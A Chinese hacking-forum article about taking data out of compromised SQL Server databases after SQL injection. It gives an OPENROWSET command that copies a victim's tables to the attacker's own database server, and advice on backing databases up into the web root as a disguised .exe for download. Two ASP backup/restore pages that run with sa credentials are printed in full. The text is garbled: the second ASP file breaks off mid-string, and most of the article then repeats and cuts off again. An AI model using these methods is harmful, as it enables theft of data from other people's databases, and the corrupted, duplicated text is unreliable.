比較全的SQL注入相關(guān)的命令分享
作者: 來源: 發(fā)布時間:2011-6-15 15:18:23 點(diǎn)擊:
反連到自己的數(shù)據(jù)庫機(jī)器,~先在本地建個跟目標(biāo)機(jī)器一樣結(jié)構(gòu)的表~字段類型使用nvarchar.然后用海洋連接對方的SQL數(shù)據(jù)庫,在查詢分析那里執(zhí)行
insert into OPENROWSET ('sqloledb','server=你數(shù)據(jù)庫服務(wù)器的IP;uid=user;pwd=pass;database=dbname;','select * from 你建立的表) select * from 對方的表—
要是數(shù)據(jù)量太大的話就看看他數(shù)據(jù)庫里有沒有自動編號的字段.select * from 表名 where id>100
這樣來弄吧
要是和WEB同臺的話,直接將庫BAK到WEB目錄下回來就OK啦。。。不過前提庫不能太大,超過2G的話SQL就超時了
如果是SA權(quán)限可以利用下面的兩個ASP程序來備份數(shù)據(jù)庫:
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 數(shù)據(jù)庫的備份與恢復(fù)</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
選擇操作:<INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>備份</label>
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>恢復(fù)</label>
<br>數(shù)據(jù)庫名:<INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>文件路徑:<INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(備份或恢復(fù)的文件路徑,備份成EXE主要為了方便下載,活活..)<br>
<input type="submit" value="確定">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql服務(wù)器
sqlname = "sa" '用戶名
sqlpassword = "數(shù)據(jù)庫密碼" '密碼
sqlLoginTimeout = 15 '登陸超時
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>備份成功!</font>"
elseif act = "restore" then
'恢復(fù)時要在沒有使用數(shù)據(jù)庫時進(jìn)行!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>恢復(fù)成功!</font>"
else
Response.write "<font color=red>沒有選擇操作</font>"
end if
end if
%>
</BODY>
</HTML>
sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>采飛揚(yáng)ASP備份MSSQL數(shù)據(jù)庫程序 V1.0--QQ:79998575</title>
</head>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}.td { font-family: "Courier New"; font-size: 9pt; background-color: #f9f9fd;}.warningColor { font-family: "Courier New"; font-size: 9pt; color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none;}tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px;}td { font-family: "Courier New"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.trHead { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}.inputLogin { font-family: "Courier New"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">采飛揚(yáng)ASP備份MSSQL數(shù)據(jù)庫程序 V1.0 </font></td>
</tr>
<tr>
<td>選擇操作:
<input type="radio" name="act" id="act_backup"value="backup" />
<label for=act_backup>備份</label>
<input type="radio" name="act" id="act_restore" value="restore" />
<label for=act_restore>恢復(fù)</label></td>
</tr>
<tr>
<td><label>SQL服務(wù)器:
<input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>用戶名:
<input name="sqlname" type="text" value="sa" />
密 碼:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>數(shù)據(jù)庫名:
<input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>文件路徑:
<input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(備份或恢復(fù)的文件路徑)</td>
</tr>
<tr>
<td><% Response.write "本文件絕對路徑:" %>
<font color="#FF0000">
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="確 定" />
<input name="Submit" type="reset" class="liuyes" size="10" value="重 置" /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>提示信息:<%
if request("action")="" then
response.write "<font color=#ff0000>不用我多說什么了吧!
insert into OPENROWSET ('sqloledb','server=你數(shù)據(jù)庫服務(wù)器的IP;uid=user;pwd=pass;database=dbname;','select * from 你建立的表) select * from 對方的表—
要是數(shù)據(jù)量太大的話就看看他數(shù)據(jù)庫里有沒有自動編號的字段.select * from 表名 where id>100
這樣來弄吧
要是和WEB同臺的話,直接將庫BAK到WEB目錄下回來就OK啦。。。不過前提庫不能太大,超過2G的話SQL就超時了
如果是SA權(quán)限可以利用下面的兩個ASP程序來備份數(shù)據(jù)庫:
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server 數(shù)據(jù)庫的備份與恢復(fù)</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
選擇操作:<INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>備份</label>
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>恢復(fù)</label>
<br>數(shù)據(jù)庫名:<INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>文件路徑:<INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(備份或恢復(fù)的文件路徑,備份成EXE主要為了方便下載,活活..)<br>
<input type="submit" value="確定">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql服務(wù)器
sqlname = "sa" '用戶名
sqlpassword = "數(shù)據(jù)庫密碼" '密碼
sqlLoginTimeout = 15 '登陸超時
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>備份成功!</font>"
elseif act = "restore" then
'恢復(fù)時要在沒有使用數(shù)據(jù)庫時進(jìn)行!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>恢復(fù)成功!</font>"
else
Response.write "<font color=red>沒有選擇操作</font>"
end if
end if
%>
</BODY>
</HTML>
sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>采飛揚(yáng)ASP備份MSSQL數(shù)據(jù)庫程序 V1.0--QQ:79998575</title>
</head>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}.td { font-family: "Courier New"; font-size: 9pt; background-color: #f9f9fd;}.warningColor { font-family: "Courier New"; font-size: 9pt; color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none;}tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px;}td { font-family: "Courier New"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.trHead { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}.inputLogin { font-family: "Courier New"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">采飛揚(yáng)ASP備份MSSQL數(shù)據(jù)庫程序 V1.0 </font></td>
</tr>
<tr>
<td>選擇操作:
<input type="radio" name="act" id="act_backup"value="backup" />
<label for=act_backup>備份</label>
<input type="radio" name="act" id="act_restore" value="restore" />
<label for=act_restore>恢復(fù)</label></td>
</tr>
<tr>
<td><label>SQL服務(wù)器:
<input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>用戶名:
<input name="sqlname" type="text" value="sa" />
密 碼:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>數(shù)據(jù)庫名:
<input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>文件路徑:
<input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(備份或恢復(fù)的文件路徑)</td>
</tr>
<tr>
<td><% Response.write "本文件絕對路徑:" %>
<font color="#FF0000">
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="確 定" />
<input name="Submit" type="reset" class="liuyes" size="10" value="重 置" /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>提示信息:<%
if request("action")="" then
response.write "<font color=#ff0000>不用我多說什么了吧!
Tags:
比較全的SQL注入相關(guān)的命令分享[收藏此文章]